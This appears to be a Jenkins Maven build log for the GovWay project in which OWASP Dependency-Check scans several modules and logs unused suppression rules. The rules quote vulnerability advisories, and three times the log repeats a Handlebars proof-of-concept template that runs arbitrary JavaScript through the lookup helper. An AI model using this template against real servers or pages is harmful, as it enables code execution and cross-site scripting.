SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:42:29 17:42:29 17:42:29 ## Recommendation 17:42:29 17:42:29 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:42:29 17:42:29 The following template can be used to demonstrate the vulnerability: 17:42:29 ```{{#with "constructor"}} 17:42:29 {{#with split as |a|}} 17:42:29 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:42:29 {{#with (concat (lookup join (slice 0 1)))}} 17:42:29 {{#each (slice 2 3)}} 17:42:29 {{#with (apply 0 a)}} 17:42:29 {{.}} 17:42:29 {{/with}} 17:42:29 {{/each}} 17:42:29 {{/with}} 17:42:29 {{/with}} 17:42:29 {{/with}}``` 17:42:29 17:42:29 17:42:29 ## Recommendation 17:42:29 17:42:29 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:42:29 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:42:29 [INFO] Analysis Complete (2 seconds) 17:42:29 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:42:29 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:42:29 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:42:29 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:42:29 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:42:29 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:42:29 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:42:29 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:42:29 [INFO] 17:42:29 [INFO] ---------------< org.openspcoop2:org.openspcoop2.shared >--------------- 17:42:29 [INFO] Building dependencies.shared 1.0 [27/67] 17:42:29 [INFO] from mvn/dependencies/shared/pom.xml 17:42:29 [INFO] --------------------------------[ pom ]--------------------------------- 17:42:29 [INFO] 17:42:29 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.shared --- 17:42:29 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/shared (includes = [*.jar], excludes = []) 17:42:29 [INFO] 17:42:29 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.shared --- 17:42:29 [INFO] 17:42:29 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.shared --- 17:42:29 [INFO] Executing tasks 17:42:29 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/shared/Saxon-HE-12.7.jar 17:42:29 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/shared/snakeyaml-2.4.jar 17:42:29 [INFO] Executed tasks 17:42:29 [INFO] 17:42:29 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.shared --- 17:42:29 [INFO] Executing tasks 17:42:34 [INFO] Executed tasks 17:42:34 [INFO] 17:42:34 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.shared --- 17:42:34 [INFO] Checking for updates 17:42:34 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:42:34 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:42:34 [INFO] Check for updates complete (74 ms) 17:42:34 [INFO] 17:42:34 17:42:34 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:42:34 17:42:34 17:42:34 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:42:34 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:42:34 17:42:34 17:42:34 [INFO] Analysis Started 17:42:36 [INFO] Finished Archive Analyzer (1 seconds) 17:42:36 [INFO] Finished File Name Analyzer (0 seconds) 17:42:36 [INFO] Finished Jar Analyzer (0 seconds) 17:42:36 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:42:36 [INFO] Finished Hint Analyzer (0 seconds) 17:42:36 [INFO] Finished Version Filter Analyzer (0 seconds) 17:42:38 [INFO] Created CPE Index (1 seconds) 17:42:39 [INFO] Finished CPE Analyzer (2 seconds) 17:42:39 [INFO] Finished False Positive Analyzer (0 seconds) 17:42:39 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:42:39 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:42:39 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:42:39 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:42:39 17:42:39 17:42:39 ## Recommendation 17:42:39 17:42:39 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:42:39 17:42:39 The following template can be used to demonstrate the vulnerability: 17:42:39 ```{{#with "constructor"}} 17:42:39 {{#with split as |a|}} 17:42:39 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:42:39 {{#with (concat (lookup join (slice 0 1)))}} 17:42:39 {{#each (slice 2 3)}} 17:42:39 {{#with (apply 0 a)}} 17:42:39 {{.}} 17:42:39 {{/with}} 17:42:39 {{/each}} 17:42:39 {{/with}} 17:42:39 {{/with}} 17:42:39 {{/with}}``` 17:42:39 17:42:39 17:42:39 ## Recommendation 17:42:39 17:42:39 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:42:39 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:42:39 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:42:39 [INFO] Analysis Complete (4 seconds) 17:42:39 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:42:39 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:42:40 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:42:40 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:42:40 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:42:40 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:42:40 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:42:40 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:42:40 [INFO] 17:42:40 [INFO] ---------------< org.openspcoop2:org.openspcoop2.spring >--------------- 17:42:40 [INFO] Building dependencies.spring 1.0 [28/67] 17:42:40 [INFO] from mvn/dependencies/spring/pom.xml 17:42:40 [INFO] --------------------------------[ pom ]--------------------------------- 17:42:40 [INFO] 17:42:40 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.spring --- 17:42:40 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/spring (includes = [*.jar], excludes = []) 17:42:40 [INFO] 17:42:40 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.spring --- 17:42:40 [INFO] 17:42:40 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.spring --- 17:42:40 [INFO] Executing tasks 17:42:45 [INFO] Executed tasks 17:42:45 [INFO] 17:42:45 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.spring --- 17:42:45 [INFO] Checking for updates 17:42:45 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:42:45 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:42:45 [INFO] Check for updates complete (99 ms) 17:42:46 [INFO] 17:42:46 17:42:46 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:42:46 17:42:46 17:42:46 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:42:46 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:42:46 17:42:46 17:42:46 [INFO] Analysis Started 17:42:46 [INFO] Finished Archive Analyzer (0 seconds) 17:42:46 [INFO] Finished File Name Analyzer (0 seconds) 17:42:46 [INFO] Finished Jar Analyzer (0 seconds) 17:42:46 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:42:46 [INFO] Finished Hint Analyzer (0 seconds) 17:42:46 [INFO] Finished Version Filter Analyzer (0 seconds) 17:42:48 [INFO] Created CPE Index (2 seconds) 17:42:49 [INFO] Finished CPE Analyzer (2 seconds) 17:42:49 [INFO] Finished False Positive Analyzer (0 seconds) 17:42:49 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:42:49 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:42:49 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:42:49 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:42:49 17:42:49 17:42:49 ## Recommendation 17:42:49 17:42:49 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:42:49 17:42:49 The following template can be used to demonstrate the vulnerability: 17:42:49 ```{{#with "constructor"}} 17:42:49 {{#with split as |a|}} 17:42:49 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:42:49 {{#with (concat (lookup join (slice 0 1)))}} 17:42:49 {{#each (slice 2 3)}} 17:42:49 {{#with (apply 0 a)}} 17:42:49 {{.}} 17:42:49 {{/with}} 17:42:49 {{/each}} 17:42:49 {{/with}} 17:42:49 {{/with}} 17:42:49 {{/with}}``` 17:42:49 17:42:49 17:42:49 ## Recommendation 17:42:49 17:42:49 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:42:49 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:42:49 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:42:49 [INFO] Analysis Complete (3 seconds) 17:42:49 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:42:49 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:42:49 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:42:49 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:42:49 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:42:49 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:42:49 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:42:49 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:42:49 [INFO] 17:42:49 [INFO] ------------< org.openspcoop2:org.openspcoop2.spring-ldap >------------- 17:42:49 [INFO] Building dependencies.spring-ldap 1.0 [29/67] 17:42:49 [INFO] from mvn/dependencies/spring-ldap/pom.xml 17:42:49 [INFO] --------------------------------[ pom ]--------------------------------- 17:42:49 [INFO] 17:42:49 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.spring-ldap --- 17:42:49 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/spring-ldap (includes = [*.jar], excludes = []) 17:42:49 [INFO] 17:42:49 [INFO] --- 